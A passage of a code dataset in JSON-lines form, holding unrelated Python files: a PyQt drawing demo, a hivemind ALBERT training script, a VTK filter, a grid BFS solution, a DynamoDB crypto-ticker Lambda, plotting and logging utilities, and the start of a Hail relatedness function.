segment2\n a1, a2 = segment1\n result = GSIntersectBezier3Line(p1, p2, p3, p4, a1, a2)\n else:\n a1, a2 = segment1\n b1, b2 = segment2\n result = GSIntersectLineLine(a1, a2, b1, b2)\n result = result.x < 100000\n if result:\n return True\n return False\n","sub_path":"Touche.glyphsPlugin/Contents/Resources/Touche.py","file_name":"Touche.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442350247","text":"import random\nimport sys\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtWidgets import QWidget, QApplication\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n\n self.setGeometry(1200, 400, 500, 300)\n self.setWindowTitle('DrawPoints')\n self.show()\n self.updateXY(100,100)\n\n def updateXY(self,recv_x,recv_y):\n global x\n x=recv_x\n global y\n y=recv_y\n\n def paintEvent(self, e):\n qp = QPainter()\n qp.begin(self)\n self.drawPoints(qp,x,y)\n qp.end()\n\n def drawPoints(self, qp,x,y):\n qp.setPen(Qt.darkBlue)\n size = self.size()\n for i in range(1000): # draw 1000 times\n x = random.randint(1, size.width() - 1)\n y = random.randint(1, size.height() - 1)\n qp.drawPoint(x, y)\n\n # qp.drawPoint(x,y)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n 
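# app.exec_() below starts the Qt event loop; paintEvent() then runs on every\n # repaint, so a later redraw could be requested with ex.update(), the standard\n # QWidget method that schedules a repaint (hypothetical usage, not in the script).\n 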
sys.exit(app.exec_())\n","sub_path":"paint/PaintPoint.py","file_name":"PaintPoint.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"550937406","text":"#!/usr/bin/env python\n\nimport os\nimport pickle\nfrom dataclasses import asdict\nfrom pathlib import Path\n\nimport torch\nimport transformers\nfrom datasets import load_from_disk\nfrom torch.utils.data import DataLoader\nfrom torch_optimizer import Lamb\nfrom transformers import DataCollatorForLanguageModeling, HfArgumentParser, TrainingArguments, set_seed\nfrom transformers.models.albert import AlbertConfig, AlbertForPreTraining, AlbertTokenizerFast\nfrom transformers.optimization import get_linear_schedule_with_warmup\nfrom transformers.trainer import Trainer\nfrom transformers.trainer_utils import is_main_process\n\nimport hivemind\nfrom hivemind.utils.logging import get_logger, use_hivemind_log_handler\n\nimport utils\nfrom arguments import AlbertTrainingArguments, AveragerArguments, CollaborationArguments, DatasetArguments\n\nuse_hivemind_log_handler(\"in_root_logger\")\nlogger = get_logger(__name__)\n\nLRSchedulerBase = getattr(torch.optim.lr_scheduler, \"_LRScheduler\", None)\n\n\ndef setup_transformers_logging(process_rank: int):\n if is_main_process(process_rank):\n transformers.utils.logging.set_verbosity_info()\n transformers.utils.logging.disable_default_handler()\n transformers.utils.logging.enable_propagation()\n\n\ndef get_model(training_args, config, tokenizer):\n # Find latest checkpoint in output_dir\n output_dir = Path(training_args.output_dir)\n logger.info(f'Checkpoint dir {output_dir}, contents {list(output_dir.glob(\"checkpoint*\"))}')\n latest_checkpoint_dir = max(output_dir.glob(\"checkpoint*\"), default=None, key=os.path.getctime)\n\n if latest_checkpoint_dir is not None:\n logger.info(f\"Loading model from {latest_checkpoint_dir}\")\n model = AlbertForPreTraining.from_pretrained(latest_checkpoint_dir)\n else:\n logger.info(f\"Training from scratch\")\n model = AlbertForPreTraining(config)\n model.resize_token_embeddings(len(tokenizer))\n\n return model\n\n\ndef get_optimizer_and_scheduler(training_args, model):\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": training_args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n\n opt = Lamb(\n optimizer_grouped_parameters,\n lr=training_args.learning_rate,\n betas=(training_args.adam_beta1, training_args.adam_beta2),\n eps=training_args.adam_epsilon,\n weight_decay=training_args.weight_decay,\n clamp_value=training_args.clamp_value,\n debias=True,\n )\n\n scheduler = get_linear_schedule_with_warmup(\n opt, num_warmup_steps=training_args.warmup_steps, num_training_steps=training_args.max_steps\n )\n\n return opt, scheduler\n\n\nclass CollaborativeCallback(transformers.TrainerCallback):\n \"\"\"\n This callback monitors and reports collaborative training progress.\n In case of a catastrophic failure, it can also revert training to a backup.\n \"\"\"\n\n def __init__(\n self,\n dht: hivemind.DHT,\n optimizer: hivemind.CollaborativeOptimizer,\n model: torch.nn.Module,\n local_public_key: bytes,\n statistics_expiration: float,\n backup_every_steps: int,\n ):\n super().__init__()\n self.model = model\n self.dht, 
self.collaborative_optimizer = dht, optimizer\n self.local_public_key = local_public_key\n self.statistics_expiration = statistics_expiration\n self.last_reported_collaboration_step = -1\n self.samples = 0\n self.steps = 0\n self.loss = 0\n self.total_samples_processed = 0\n self.backup_every_steps = backup_every_steps\n self.latest_backup = self.backup_state()\n\n def on_train_begin(\n self, args: TrainingArguments, state: transformers.TrainerState, control: transformers.TrainerControl, **kwargs\n ):\n logger.info(\"Loading state from peers\")\n self.collaborative_optimizer.load_state_from_peers()\n\n def on_step_end(\n self, args: TrainingArguments, state: transformers.TrainerState, control: transformers.TrainerControl, **kwargs\n ):\n control.should_log = True\n if not self.params_are_finite():\n self.restore_from_backup(self.latest_backup)\n return control\n\n if state.log_history:\n self.loss += state.log_history[-1][\"loss\"]\n self.steps += 1\n if self.collaborative_optimizer.local_step != self.last_reported_collaboration_step:\n self.last_reported_collaboration_step = self.collaborative_optimizer.local_step\n self.total_samples_processed += self.samples\n samples_per_second = self.collaborative_optimizer.performance_ema.samples_per_second\n statistics = utils.LocalMetrics(\n step=self.collaborative_optimizer.local_step,\n samples_per_second=samples_per_second,\n samples_accumulated=self.samples,\n loss=self.loss,\n mini_steps=self.steps,\n )\n logger.info(f\"Step #{self.collaborative_optimizer.local_step}\")\n logger.info(f\"Your current contribution: {self.total_samples_processed} samples\")\n logger.info(f\"Performance: {samples_per_second} samples per second.\")\n if self.steps:\n logger.info(f\"Local loss: {self.loss / self.steps}\")\n if self.collaborative_optimizer.local_step % self.backup_every_steps == 0:\n self.latest_backup = self.backup_state()\n\n self.loss = 0\n self.steps = 0\n if self.collaborative_optimizer.is_synchronized:\n self.dht.store(\n key=self.collaborative_optimizer.prefix + \"_metrics\",\n subkey=self.local_public_key,\n value=statistics.dict(),\n expiration_time=hivemind.get_dht_time() + self.statistics_expiration,\n return_future=True,\n )\n\n self.samples = self.collaborative_optimizer.local_samples_accumulated\n\n return control\n\n @torch.no_grad()\n def params_are_finite(self):\n for param in self.model.parameters():\n if not torch.all(torch.isfinite(param)):\n return False\n return True\n\n @torch.no_grad()\n def backup_state(self) -> bytes:\n return pickle.dumps(\n {\"model\": self.model.state_dict(), \"optimizer\": self.collaborative_optimizer.opt.state_dict()}\n )\n\n @torch.no_grad()\n def restore_from_backup(self, backup: bytes):\n state = pickle.loads(backup)\n self.model.load_state_dict(state[\"model\"])\n self.collaborative_optimizer.opt.load_state_dict(state[\"optimizer\"])\n\n\nclass NoOpScheduler(LRSchedulerBase):\n \"\"\"Dummy scheduler for transformers.Trainer. 
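It exposes the optimizer's current learning rates but never steps them itself. 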
The real scheduler is defined in CollaborativeOptimizer.scheduler\"\"\"\n\n def get_lr(self):\n return [group[\"lr\"] for group in self.optimizer.param_groups]\n\n def print_lr(self, *args, **kwargs):\n if self.optimizer.scheduler:\n return self.optimizer.scheduler.print_lr(*args, **kwargs)\n\n def step(self):\n self._last_lr = self.get_lr()\n\n def state_dict(self):\n return {}\n\n def load_state_dict(self, *args, **kwargs):\n logger.debug(\"Called NoOpScheduler.load_state_dict\")\n\n\ndef main():\n parser = HfArgumentParser((AlbertTrainingArguments, DatasetArguments, CollaborationArguments, AveragerArguments))\n training_args, dataset_args, collaboration_args, averager_args = parser.parse_args_into_dataclasses()\n\n logger.info(f\"Found {len(collaboration_args.initial_peers)} initial peers: {collaboration_args.initial_peers}\")\n if len(collaboration_args.initial_peers) == 0:\n raise ValueError(\"Please specify at least one network endpoint in initial peers.\")\n\n setup_transformers_logging(training_args.local_rank)\n logger.info(f\"Training/evaluation parameters:\\n{training_args}\")\n\n # Set seed before initializing model.\n set_seed(training_args.seed)\n\n config = AlbertConfig.from_pretrained(dataset_args.config_path, cache_dir=dataset_args.cache_dir)\n tokenizer = AlbertTokenizerFast.from_pretrained(dataset_args.tokenizer_path, cache_dir=dataset_args.cache_dir)\n model = get_model(training_args, config, tokenizer)\n model.to(training_args.device)\n\n tokenized_datasets = load_from_disk(Path(dataset_args.dataset_path))\n # This data collator will take care of randomly masking the tokens.\n data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer)\n\n opt, scheduler = get_optimizer_and_scheduler(training_args, model)\n\n validators, local_public_key = utils.make_validators(collaboration_args.experiment_prefix)\n\n dht = hivemind.DHT(\n start=True,\n initial_peers=collaboration_args.initial_peers,\n client_mode=collaboration_args.client_mode,\n record_validators=validators,\n use_ipfs=collaboration_args.use_ipfs,\n host_maddrs=collaboration_args.host_maddrs,\n announce_maddrs=collaboration_args.announce_maddrs,\n identity_path=collaboration_args.identity_path,\n )\n utils.log_visible_maddrs(dht.get_visible_maddrs(), only_p2p=collaboration_args.use_ipfs)\n\n total_batch_size_per_step = training_args.per_device_train_batch_size * training_args.gradient_accumulation_steps\n if torch.cuda.device_count() != 0:\n total_batch_size_per_step *= torch.cuda.device_count()\n\n adjusted_target_batch_size = collaboration_args.target_batch_size - collaboration_args.batch_size_lead\n\n collaborative_optimizer = hivemind.CollaborativeOptimizer(\n opt=opt,\n dht=dht,\n scheduler=scheduler,\n prefix=collaboration_args.experiment_prefix,\n compression=hivemind.Float16Compression(),\n batch_size_per_step=total_batch_size_per_step,\n bandwidth=collaboration_args.bandwidth,\n target_batch_size=adjusted_target_batch_size,\n client_mode=collaboration_args.client_mode,\n verbose=True,\n start=True,\n **asdict(averager_args),\n )\n\n class TrainerWithIndependentShuffling(Trainer):\n def get_train_dataloader(self) -> DataLoader:\n \"\"\"Shuffle data independently for each peer to avoid duplicating batches [important for quality]\"\"\"\n torch.manual_seed(hash(local_public_key))\n return super().get_train_dataloader()\n\n trainer = TrainerWithIndependentShuffling(\n model=model,\n args=training_args,\n tokenizer=tokenizer,\n data_collator=data_collator,\n train_dataset=tokenized_datasets[\"train\"] if 
training_args.do_train else None,\n eval_dataset=tokenized_datasets[\"validation\"] if training_args.do_eval else None,\n optimizers=(collaborative_optimizer, NoOpScheduler(collaborative_optimizer)),\n callbacks=[\n CollaborativeCallback(\n dht,\n collaborative_optimizer,\n model,\n local_public_key,\n collaboration_args.statistics_expiration,\n collaboration_args.backup_every_steps,\n )\n ],\n )\n trainer.remove_callback(transformers.trainer_callback.PrinterCallback)\n trainer.remove_callback(transformers.trainer_callback.ProgressCallback)\n\n # Training\n if training_args.do_train:\n latest_checkpoint_dir = max(\n Path(training_args.output_dir).glob(\"checkpoint*\"), default=None, key=os.path.getctime\n )\n\n trainer.train(model_path=latest_checkpoint_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/albert/run_trainer.py","file_name":"run_trainer.py","file_ext":"py","file_size_in_byte":11900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"444445778","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-i686/egg/pylocator/decimate_filter.py\n# Compiled at: 2012-04-18 08:46:43\nfrom __future__ import division\nimport sys, os, vtk, gtk\nfrom gtkutils import ProgressBarDialog, str2posnum_or_err\n\nclass DecimateFilter(vtk.vtkDecimatePro):\n \"\"\"\n CLASS: DecimateFilter\n DESCR:\n \n Public attrs:\n targetReduction\n #aspectRatio \n #initialError \n #errorIncrement \n #maxIterations \n #initialAngle \n \"\"\"\n fmts = {'targetReduction': '%1.2f'}\n labels = {'targetReduction': 'Target reduction'}\n converters = {'targetReduction': str2posnum_or_err}\n targetReduction = 0.8\n\n def __init__(self):\n prog = ProgressBarDialog(title='Rendering surface', parent=None, msg='Decimating data....', size=(300,\n 40))\n prog.set_modal(True)\n\n def start(o, event):\n prog.show()\n while gtk.events_pending():\n gtk.main_iteration()\n\n def progress(o, event):\n val = o.GetProgress()\n prog.bar.set_fraction(val)\n while gtk.events_pending():\n gtk.main_iteration()\n\n def end(o, event):\n prog.hide()\n while gtk.events_pending():\n gtk.main_iteration()\n\n self.AddObserver('StartEvent', start)\n self.AddObserver('ProgressEvent', progress)\n self.AddObserver('EndEvent', end)\n return\n\n def update(self):\n self.SetTargetReduction(self.targetReduction)","sub_path":"pycfiles/pyloci-0.1.1.24-py3-none-any/decimate_filter.py","file_name":"decimate_filter.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"355342465","text":"dx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\ntunnel = [[], [0,1,2,3], [0,2], [1,3], [0,1],[1,2],[2,3],[3,0]]\ntunnel_possible = [[1,2,5,6], [1,3,6,7], [1,2,4,7],[1,3,4,5]]\n\n\nT = int(input())\nfor test_case in range(1, T+1):\n N, M, R, C, L = map(int, input().split())\n tunnels = []\n for i in range(N):\n tunnels.append(list(map(int, input().split())))\n\n\n queue = [(R,C, 1)]\n visited = [(R,C)]\n while queue:\n x,y, t = queue.pop(0)\n if t == L:\n continue\n tun = tunnel[tunnels[x][y]]\n for i in tun:\n new_x = x + dx[i]\n new_y = y + dy[i]\n if new_x < 0 or new_x >= N or new_y < 0 or new_y >= M:\n continue\n\n if tunnels[new_x][new_y] not in tunnel_possible[i]:\n continue\n if (new_x,new_y) in visited:\n continue\n visited.append((new_x,new_y))\n 
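# Hedged aside: 'visited' is a Python list, so the membership test above is\n # O(len(visited)); a set of (x, y) tuples (visited = {(R, C)} together with\n # visited.add(...)) would make it O(1) while still giving len(visited) below.\n 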
queue.append((new_x, new_y, t+1))\n\n\n print(\"#{} {}\".format(test_case, len(visited)))","sub_path":"SW Expert Academy/탈주범 검거.py","file_name":"탈주범 검거.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269234056","text":"#-*- coding: utf-8 -*-\nimport pygame\n\nclass Platform(pygame.sprite.Sprite):\n\t\"\"\"\n\t\tInherits from pygame's Sprite class,\n\t\tHolds the image and position of a platform.\n\t\tThe ID attribute makes it possible to identify them one by one. (No use for the moment)\n\t\"\"\"\n\tID = 0\n\tdef __init__(self, image, pos):\n\t\tsuper().__init__()\n\t\tself.image = image\n\t\tself.rect = image.get_rect()\n\t\tself.rect.x, self.rect.y = pos\n\t\tPlatform.ID += 1\n\t\tself.id = Platform.ID\n","sub_path":"data/Platform.py","file_name":"Platform.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"353309972","text":"# coding: utf-8\nimport logging\nimport tempfile\nimport pandas as pd\n\nlog = logging.getLogger(__name__)\n\n\nclass RunMixin(object):\n def run_strat(self, strategy, return_df=True):\n \"\"\"run provided strategy, returns dataframe with all steps\"\"\"\n observation = self.reset()\n done = False\n while not done:\n action = strategy(observation, self) # call strategy\n observation, reward, done, info = self.step(action)\n\n return self.sim.to_df() if return_df else None\n\n def run_strats(self, strategy, episodes=1, write_log=True, return_df=True):\n \"\"\" run provided strategy the specified # of times, possibly\n writing a log and possibly returning a dataframe summarizing activity.\n\n Note that writing the log is expensive and returning the df is moreso.\n For training purposes, you might not want to set both.\n \"\"\"\n logfile = None\n if write_log:\n logfile = tempfile.NamedTemporaryFile(delete=False)\n log.info('writing log to %s', logfile.name)\n need_df = write_log or return_df\n\n alldf = None\n\n for i in range(episodes):\n df = self.run_strat(strategy, return_df=need_df)\n if write_log:\n df.to_csv(logfile, mode='a')\n if return_df:\n alldf = df if alldf is None else pd.concat([alldf, df], axis=0)\n\n return alldf\n","sub_path":"gym_trading/envs/mixin.py","file_name":"mixin.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"570744506","text":"from __future__ import print_function, division, absolute_import, with_statement, unicode_literals, generators\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.switch_backend('agg')\n\nclass LossLogger(object):\n def __init__(self, names, path):\n self.names = names\n if os.path.exists(path):\n with open(path, 'r') as f:\n names_ = tuple(f.readline().strip().split())\n assert self.names == names_, \"given names: {} prev names: {}\".format(\"\\t\".join(self.names), \"\\t\".join(names_))\n self.a = [list(map(float, line.strip().split())) for line in f]\n else:\n with open(path, 'w') as f:\n print('\\t'.join(names), file=f)\n self.a = []\n self.f = open(path, 'a', 1)\n def append(self, e):\n self.a.append(e)\n print('\\t'.join(map(lambda x: \"{:.6f}\".format(x), e)), file=self.f)\n def recent(self, k):\n k = min(k, len(self.a))\n return list(map(np.mean, zip(*self.a[-k:])))\n def recent_repr(self, k):\n v = self.recent(k)\n return \"\\t\".join(\"{}: {:.3f}\".format(name, val) for name, val in zip(self.names, 
v))\n def plot(self, figure_name):\n plt.figure(figsize=(14, 10))\n shapes = ['x', '^', 'v', '--']\n sizes = [6, 2, 2, 2]\n for name, a, shape, size in zip(self.names, zip(*self.a), shapes, sizes):\n plt.plot(a, shape, linewidth=size, label=name)\n plt.ylabel('loss')\n plt.xlabel('training steps')\n plt.legend(loc=2., borderaxespad=0.)\n plt.savefig('{}.png'.format(figure_name))\n plt.close()\n\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203324931","text":"from home.languages.english_messages import ENGLISH_MESSAGES\nfrom home.languages.french_messages import FRENCH_MESSAGES\n\n\nCODES = [\n 'success',\n 'danger'\n]\n\nACTIONS = [\n 'new',\n 'edit',\n 'delete',\n 'notify',\n 'mark_complete',\n 'verify',\n 'get',\n 'clear',\n\n # USER ACTIONS\n 'reset_password',\n 'upload_photo',\n\n # HOSTING\n 'start',\n 'stop',\n 'terminate',\n 'remove_access_key',\n 'request_access_key',\n\n # BILL ACTIONS\n 'mark_received',\n 'report',\n 'remove_report',\n\n # CONSULT REQUEST ACTIONS\n 'mark_meeting',\n\n # MESSAGE ACTIONS\n 'mark_read', 'mark_replied', 'mark_phone', 'mark_spam', 'mark_website', 'mark_app', 'mark_mobile',\n 'mark_other', 'mark_hosting', 'mark_consult',\n 'change_client'\n]\n\nOBJECTS = [\n 'user',\n 'profile',\n 'client',\n 'message',\n 'project',\n 'consult',\n 'hosting',\n 'consult_request',\n 'required_action',\n 'bill',\n 'event',\n 'timeline_section',\n 'timeline_item',\n 'file',\n 'chat_message'\n]\n\n\ndef get_status_message(info, lang):\n return {\n 'message': get_message(info, lang),\n 'code': get_message_code(info['code']),\n }\n\n\ndef get_message_info(request):\n rc = request.GET.get('code', -1)\n code = get_int(rc)\n obj = request.GET.get('object', '')\n action = request.GET.get('action', '')\n return {\n 'code': code,\n 'obj': obj if obj in OBJECTS else '',\n 'action': action if action in ACTIONS else ''\n }\n\n\ndef get_message_code(code):\n try:\n return CODES[code]\n except IndexError:\n return ''\n\n\ndef get_message(info, lang):\n if (info['code'] >= 0) and info['obj'] and info['action']:\n if lang == 'fr':\n try:\n return FRENCH_MESSAGES[info['obj']][info['action']][info['code']]\n except (KeyError, IndexError):\n return ''\n else:\n try:\n return ENGLISH_MESSAGES[info['obj']][info['action']][info['code']]\n except (KeyError, IndexError):\n return ''\n return ''\n\n\ndef get_int(num):\n try:\n return int(num)\n except ValueError:\n return -1\n","sub_path":"home/languages/util_status_messages.py","file_name":"util_status_messages.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301701615","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n usage = \"usage: %prog -d base_folder_path\"\n parser = OptionParser(usage=usage)\n\n parser.add_option(\"-d\", \"--base-folder\",\n action=\"store\", type=\"string\", dest=\"base_folder\",\n help=\"provide a base folder which will have this structure: ./01, ./01/*.csv, ./02, ./02/*.csv, ...\")\n (options, args) = parser.parse_args()\n\n if options.base_folder is None:\n parser.error(\"no base_folder\")\n\n fig = plt.figure()\n pos_ax = fig.add_subplot(121, projection='3d')\n ori_ax = 
fig.add_subplot(122, projection='3d')\n\n files = os.listdir(options.base_folder)\n for f in files:\n path = os.path.join(options.base_folder, f)\n if not os.path.isdir(path):\n continue\n legend_name = f\n df = pd.read_csv(os.path.join(path, f+'-tag_multimodal.csv'),sep=',')\n \n df = df[[\n u'time', \n u'.endpoint_state.pose.position.x',\n u'.endpoint_state.pose.position.y',\n u'.endpoint_state.pose.position.z',\n u'.endpoint_state.pose.orientation.x',\n u'.endpoint_state.pose.orientation.y',\n u'.endpoint_state.pose.orientation.z',\n u'.endpoint_state.pose.orientation.w',\n u'.tag']]\n\n df = df.loc[df['.tag'] != 0]\n df['time']= pd.to_datetime(df['time'], errors='coerce')\n start_time = df['time'].iloc[0]\n df['time']= df['time']-start_time\n\n pos_ax.plot(\n df['.endpoint_state.pose.position.x'].tolist(), \n df['.endpoint_state.pose.position.y'].tolist(), \n df['.endpoint_state.pose.position.z'].tolist(), \n label=f)\n pos_ax.legend()\n pos_ax.set_title(\"pos xyz\")\n\n ori_ax.plot(\n df['.endpoint_state.pose.orientation.x'].tolist(), \n df['.endpoint_state.pose.orientation.y'].tolist(), \n df['.endpoint_state.pose.orientation.z'].tolist(), \n label=f)\n ori_ax.legend()\n ori_ax.set_title(\"ori xyz\")\n plt.show()\n\n","sub_path":"REAL_BAXTER_PICK_N_PLACE_20170704_with_broken_wrench/success/visualize_raw_data.py","file_name":"visualize_raw_data.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"31993929","text":"import numpy as np\nfrom scipy import sparse as sps\nimport time\n\n# Throw exceptions for all numerical errors (i.e. overflow/underflow)\nnp.seterr(all=\"raise\")\n\n# SGD with Momentum. Single pass/epoch\n# Parameters:\n## data: Actual ratings\n## locs: (row, col) index pairs of the ratings\n## V: user matrix\n## W: item matrix\n## V_veloc: velocity/momentum for user matrix\n## W_veloc: velocity/momentum for item matrix\n## mu: global bias (empirical mean)\n## b_v: user bias\n## b_w: item bias\n## bv_veloc: velocity/momentum for user bias\n## bw_veloc: velocity/momentum for item bias\n## eta: learning rate\n## gamma: momentum rate\n## l2_reg: L2 regularizer (lambda)\n#\n# Returns:\n# V, W, V_veloc, W_veloc, b_v, b_w, bv_veloc, bw_veloc\n\ndef sgd_momentum(data, locs, V, W, V_veloc, W_veloc, mu, b_v, b_w, bv_veloc, bw_veloc, eta = 0.01, gamma=0.5, l2_reg = 0.5):\n \n inds = np.random.permutation(len(data.data))\n \n for ind in inds:\n i,j = locs[ind]\n r = data.data[ind]\n \n error = (r - (mu + b_v[i] + b_w[j] + V[i].dot(W[j].T)))\n \n V_veloc[i] = gamma * V_veloc[i] - eta * (error * W[j] - l2_reg * V[i])\n W_veloc[j] = gamma * W_veloc[j] - eta * (error * V[i] - l2_reg * W[j])\n bv_veloc[i] = gamma * bv_veloc[i] - eta * (error - l2_reg * b_v[i])\n bw_veloc[j] = gamma * bw_veloc[j] - eta * (error - l2_reg * b_w[j])\n \n W[j] -= W_veloc[j]\n V[i] -= V_veloc[i]\n b_v[i] -= bv_veloc[i]\n b_w[j] -= bw_veloc[j]\n \n return V, W, V_veloc, W_veloc, b_v, b_w, bv_veloc, bw_veloc\n\ndef obj_func(data, locs, V, W, mu, b_v, b_w, l2_reg):\n obj = 0.\n inds = np.arange(len(data.data))\n inds = inds[0:1000000]\n for ind in inds:\n i, j = locs[ind]\n r = data.data[ind]\n obj += (r - (mu + b_v[i] + b_w[j] + V[i].dot(W[j].T)))**2\n print (\"Training RMSE (first 1M samples): {}\".format((obj/len(inds))**0.5))\n return obj + l2_reg * (np.square(V).sum() + np.square(W).sum() + np.square(b_v).sum() + np.square(b_w).sum())\n\n# Gradient descent function. 
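Repeatedly calls sgd_momentum() per epoch, decaying eta\n# when the objective increases and growing gamma between epochs. A hedged usage\n# sketch (assumed shapes: V is n_users x K, W is n_items x K, velocities zero):\n#\n# V, W, b_v, b_w, epochs, failed = gradient_descent(\n# data, V, W, np.zeros_like(V), np.zeros_like(W),\n# mu, b_v, b_w, np.zeros_like(b_v), np.zeros_like(b_w),\n# start_eta=0.01, gamma=0.5, l2_reg=0.05)\n#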
\n# Parameters:\n## V: user matrix\n## W: item matrix\n## V_veloc: velocity/momentum for user matrix\n## W_veloc: velocity/momentum for item matrix\n## mu: global bias (empirical mean)\n## b_v: user bias\n## b_w: item bias\n## bv_veloc: velocity/momentum for user bias\n## bw_veloc: velocity/momentum for item bias\n## start_eta: Initial learning rate for SGD\n## gamma: Initial momentum rate \n## l2_reg: L2 regularizer (lambda)\n#\n# Returns:\n# V, W, b_v, b_w, number of epochs trained for, error status\n\ndef gradient_descent(data, \n V, W, \n V_veloc, W_veloc, \n mu, b_v, b_w, \n bv_veloc, bw_veloc, \n start_eta, gamma, l2_reg):\n \n last_obj = 1e20\n eta = start_eta\n locs = np.array(list(zip(data.row, data.col)))\n epoch_cnt = 1\n \n while True:\n print (\"Starting epoch {} ...\".format(epoch_cnt))\n start = time.time()\n try:\n V, W, V_veloc, W_veloc, b_v, b_w, bv_veloc, bw_veloc = sgd_momentum(data, locs, \n V, W, V_veloc, W_veloc, \n mu, b_v, b_w, bv_veloc, bw_veloc, \n eta, gamma, l2_reg)\n except FloatingPointError as e:\n print (\"Floating point error encountered: {}, aborting SGD.\".format(e))\n return V, W, b_v, b_w, epoch_cnt, True\n \n end = time.time()\n print (\"Finished epoch {} (Time: {} s)\".format(epoch_cnt, round(end-start, 0)))\n \n obj = obj_func(data, locs, V, W, mu, b_v, b_w, l2_reg)\n print (\"Cost: {}\".format(obj))\n if obj > last_obj:\n print (\"Adjusting eta....\")\n eta *= 0.1\n elif (last_obj-obj)/last_obj <= 0.001:\n return V, W, b_v, b_w, epoch_cnt, False\n else:\n pass\n \n if eta < 1.0e-4:\n return V, W, b_v, b_w, epoch_cnt, False\n \n last_obj = obj\n gamma *= 1.1\n epoch_cnt += 1\n \n print (\"-------------\")","sub_path":"hw1/sgd.py","file_name":"sgd.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92743902","text":"import boto3\nfrom botocore.vendored import requests\nfrom datetime import datetime, timezone\nfrom dateutil import tz\nfrom decimal import *\nimport logging\n\nAPI_TICKER = \"https://api.coinone.co.kr/ticker?currency=all\"\nCOINS = [\"btc\", \"eth\", \"etc\", \"xrp\"]\n\n\ndef get_datetime_kst_now():\n return datetime.now(timezone.utc).astimezone(tz.gettz(\"Asia/Seoul\"))\n\n\ndef lambda_handler(event, context):\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n isTest = None\n try:\n isTest = event[\"isTest\"]\n except KeyError:\n logger.info(\"isTest:{}\".format(isTest))\n\n if isTest:\n logger.addHandler(logging.StreamHandler())\n\n dtKstNow = get_datetime_kst_now()\n dKst = dtKstNow.strftime('%Y-%m-%d')\n logger.info(\"dtKstNow:{} dKst:{}\".format(dtKstNow, dKst))\n\n r = requests.get(API_TICKER)\n ticker = r.json()\n\n if ticker[\"result\"] != \"success\":\n raise Exception(\"invalid response in coinone ticker api. 
errorcode is \" + ticker['errorCode'])\n\n dynamodb = boto3.resource(\"dynamodb\")\n table = dynamodb.Table(\"coinone_ticker\")\n\n for coin in COINS:\n timestamp = Decimal(ticker[\"timestamp\"])\n price_krw = ticker[coin][\"last\"]\n\n logger.info(\"coin:{} timestamp:{}, price_krw:{}\".format(\n coin.upper(), timestamp, price_krw\n ))\n\n if isTest is not True:\n table.put_item(\n Item={\n \"coin\": coin.upper(),\n \"timestamp\": timestamp,\n \"date_kst\": dKst,\n \"price_krw\": price_krw,\n }\n )\n","sub_path":"probe-coinone/coinone_ticker.py","file_name":"coinone_ticker.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"12927239","text":"import hail as hl\nimport hail.expr.aggregators as agg\nfrom hail.expr import (expr_float64, expr_call, expr_array, analyze,\n matrix_table_source)\nfrom hail.expr.types import tarray\nfrom hail import ir\nfrom hail.linalg import BlockMatrix\nfrom hail.table import Table\nfrom hail.typecheck import typecheck, nullable, numeric, enumeration\n\nfrom ..pca import hwe_normalized_pca\n\n\n@typecheck(call_expr=expr_call,\n min_individual_maf=numeric,\n k=nullable(int),\n scores_expr=nullable(expr_array(expr_float64)),\n min_kinship=nullable(numeric),\n statistics=enumeration('kin', 'kin2', 'kin20', 'all'),\n block_size=nullable(int),\n include_self_kinship=bool)\ndef pc_relate(call_expr, min_individual_maf, *, k=None, scores_expr=None,\n min_kinship=None, statistics=\"all\", block_size=None,\n 